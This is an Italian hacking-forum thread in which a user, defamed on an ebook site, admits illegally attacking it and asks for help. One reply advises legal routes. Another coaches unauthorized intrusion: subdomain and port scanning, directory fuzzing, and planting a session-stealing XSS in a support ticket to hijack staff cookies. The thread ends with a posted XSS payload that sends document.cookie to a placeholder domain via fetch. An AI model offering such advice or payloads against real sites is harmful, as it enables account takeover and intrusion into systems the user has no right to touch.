Discussione Aiuto per "defacing" etico

Stato
Discussione chiusa ad ulteriori risposte.

Netcat

Helper
17 Gennaio 2022
535
148
391
721
Buonasera ragazzuoli. Cercando il mio nome su Google è spuntato fuori il nome di un sito di vendite di ebook dove della gente ha pubblicato dei contenuti diffamatori a mio carico, e li ho verificati. Praticamente sarei stato impersonato, e con mio nome e cognome è comparso un "ebook" diffamatorio (perché io non ho mai scritto o pubblicato ebook).

Soluzione 1. Ho scritto al supporto del sito, ma finora sembrano aver fatto orecchie da mercante, asserendo inoltre che rispondono solamente agli ordini dei tribunali statunitensi per querele di diffamazione contro anonimi;

Soluzione 2. Ho attaccato il sito web sfruttando tutte le mie conoscenze, per cercare di rimuovere esclusivamente i contenuti diffamatori e cancellare l'account falso che sta usando il mio nome. Nonostante il CloudFlare ho scoperto 2 vulnerabilità, tuttavia sono entrambe OuS (out of scope, la prima è OpenRedirect - buona solo per fare phishing e non mi interessa - la seconda, fa crashare il browser di chi visita il sito se si verifica una determinata condizione, e quindi OuS pure quella) - Perché me ne serve una che mi permetta specificatamente di alterare i contenuti diffamatori (come XSS, SQLi, OS command injection, SSIT), e quindi una vulnerabilità che mi conceda un discreto accesso al server. Il punto è questo, il CF blocca la maggior parte delle query XSS e SQL inviandomi un sacco di 403, e io i payload ho provato anche ad offuscarli, ma non hanno sortito gli effetti sperati.

Tuttavia sono determinato a voler rimuovere i contenuti dannosi (messi a pagamento dall'anonimo fra l'altro, e come prova ulteriore ho il fatto che non ho ricevuto neanche una transazione per la vendita di questa cazzata) - Lo so che è illegale quello che sto facendo, ma di fronte alle ingiustizie sono stato storicamente un "machiavellico", specialmente quando il supporto della legge viene meno, "Non sei cittadino USA? Umano di serie B, fuori dalla nostra casella di posta" <- Così si riassume la risposta dello Staff.

Come devo fa? Io non sono un cittadino degli USA, appena gli ho scritto che sono italiano sono andati afk (per sempre). Mentre il sito web che gestiscono ha CF, un firewall incazzato nero che tanka ogni variante di SQLi, XSS ecc. - Cioè, a voi non piacerebbe ritrovarvi diffamati su un sito web "corazzato" oltre tutto. Per bypassare il CF ho provato a mappare i sub-domains e i record DNS (e il JPEG della mappa dell'infrastruttura del sito cel'ho ancora)

Detto ciò, vorrei leggere da voi sia suggerimenti sia per soluzioni legali e ragionevoli, che ascoltare anche le idee di chi è un po' più "rancoroso" come me (che mangia pane e vendetta per intenderci), perché le aree di questo sito piene di cose false su di me vanno defacciate, ad ogni costo (il resto del sito deve rimanere intatto)
 
  • Love
Reazioni: --- Ra ---
Se rispondono solo agli USA, devi usare il DMCA, bisogna fare una richiesta ed intervengono, gli amministratori del sito sono obbligati a rispondere non a te ma a loro negli USA.
Se vuoi bypassare CF devi trovare l'ip pubblico del server che ospita il sito, in passato ho letto alcune tecniche, ma non ho mai provato.
 
  • Mi piace
Reazioni: Netcat
Se rispondono solo agli USA, devi usare il DMCA, bisogna fare una richiesta ed intervengono, gli amministratori del sito sono obbligati a rispondere non a te ma a loro negli USA.
Se vuoi bypassare CF devi trovare l'ip pubblico del server che ospita il sito, in passato ho letto alcune tecniche, ma non ho mai provato.
sto studiando la materia in questo periodo e purtroppo se non vado errando il DMCA non comprende questa problematica.

estratto preso da: https://www.dmca.com/FAQ/How-can-I-file-a-DMCA-Takedown-Notice

Who can file a DMCA Takedown Notice?​

  1. content creators/owners
  2. copyright owners
  3. content publishers or distributors (with permission of the content or copyright owners)
  4. NFT owners
  5. code writers and publishers
  6. social media users and participants
  7. subject contained within the content and published without permission (special considerations may be required)

La condizione in questo caso dovrebbe essere l'ultima, e nonostante tutto parlano comunque che bisogna esprimere delle considerazioni in merito.

è anche vero che come sto studiando all'università, so che ci sono paesi che permetto di hostare contenuti "strani" garantendo immunità da reclami DMCA/Copyright e vari.

Quello che farei nel tuo caso andrei dalla postale o dai carabinieri e denunciare la piattaforma per diffamazione. Solitamente con una richiesta da parte di un'autorità Cloudflare rivela l'IP del dominio per permettere il corretto svolgimento delle indagini.

Buona fortuna per tutto il resto :)
 
  • Mi piace
Reazioni: Netcat
Ciao Netcat, ho avuto modo di conoscerti sul forum e sono sicuro che tu sia un bravo ragazzo. Tra l'altro so che studi all'università...vale la pena mettersi nei guai legali per degli idioti del genere? Pensaci su. D'altronde so altrettanto bene che la giustizia in questo mondo è una chimera e che le autorità, nella maggior parte dei casi, non fanno il loro dovere. Polizia e carabinieri ignorano denunce di scomparsa, di frodi e di violenza sulle donne, figuriamoci se prenderanno in considerazione una denuncia di un comune mortale, come noi, inerente al settore informatico.

Anch'io, molte volte in passato, mi sono comportato come giustiziere di me stesso e continuo a credere che farsi giustizia da soli, quando non ci sono più altre alternative, sia la cosa più giusta, ma questo spesso può portare a delle gravi conseguenze e devi tenerne conto.

Consapevole di ciò, arriviamo al dunque. Come hai provato a mappare i sub-domains? Provato con sublist3r? Provato a cercare con le Google dorks e sul sito crt.sh?

Per quanto riguarda XSS, hai provato a verificare se sono presenti blind XSS? Cioè roba che non viene mostrata a schermo, ma che viene eseguita comunque sottotraccia. Un'altra idea: puoi creare un account su quel sito di m***a, crei un ticket di supporto, se possibile, e provi a inserire nella textarea del messaggio uno script XSS che effettua uno stealing della sessione: in questo modo quando un helper andrà a leggere il tuo messaggio potrai ottenere i cookie della sua sessione e loggarti con il suo account.

Provato ad effettuare una scansione con nmap per individuare eventuali servizi vulnerabili e porte attive sul server?

Inoltre, se vuoi testare delle command injection, ti occorre capire che sistema operativo gira sul server.

Hai provato a fare anche un po' di content Discovery per individuare potenziali cartelle e file che non pensavi esistessero? Robots.txt e robe così. Dei buoni programmi sono fuzz oppure gobuster.

Falli neri netcat, io sono dalla tua parte, ma stai attento!
 
No aspetta forse quelli del supporto stanno smettendo di fare i fasci... Mi hanno ricontattato e hanno cambiato idea, mi hanno detto pure che non serve nessun DMCA e nessuna cittadinanza statunitense... Grazie a loro ho defacciato il 50% del pattume diffamatorio, ci sono ancora delle tracce però... Forse hanno visto i log dei payload sul server e si sono cacati in mano per paura che prima o poi bypassavo i filtri.
 
  • Mi piace
Reazioni: Team Arcanum
No aspetta forse quelli del supporto stanno smettendo di fare i fasci... Mi hanno ricontattato e hanno cambiato idea, mi hanno detto pure che non serve nessun DMCA e nessuna cittadinanza statunitense... Grazie a loro ho defacciato il 50% del pattume diffamatorio, ci sono ancora delle tracce però... Forse hanno visto i log dei payload sul server e si sono cacati in mano per paura che prima o poi bypassavo i filtri.
Meglio così, sono felice che la faccenda si sia risolta in questo modo.
 
  • Mi piace
Reazioni: Team Arcanum
Per fortuna hanno cambiato idea... Sennò ci pensava
Codice:
<scr1+pt>alert(1)</scr1+pt>
:^)
1717679772735.png
 
O ancora meglio ci pensava :asdangel::

JavaScript:
<scr1+pt>fetch('https://nomeDominio?cookie=' + btoa(document.cookie));</scr1+pt>
 
Stato
Discussione chiusa ad ulteriori risposte.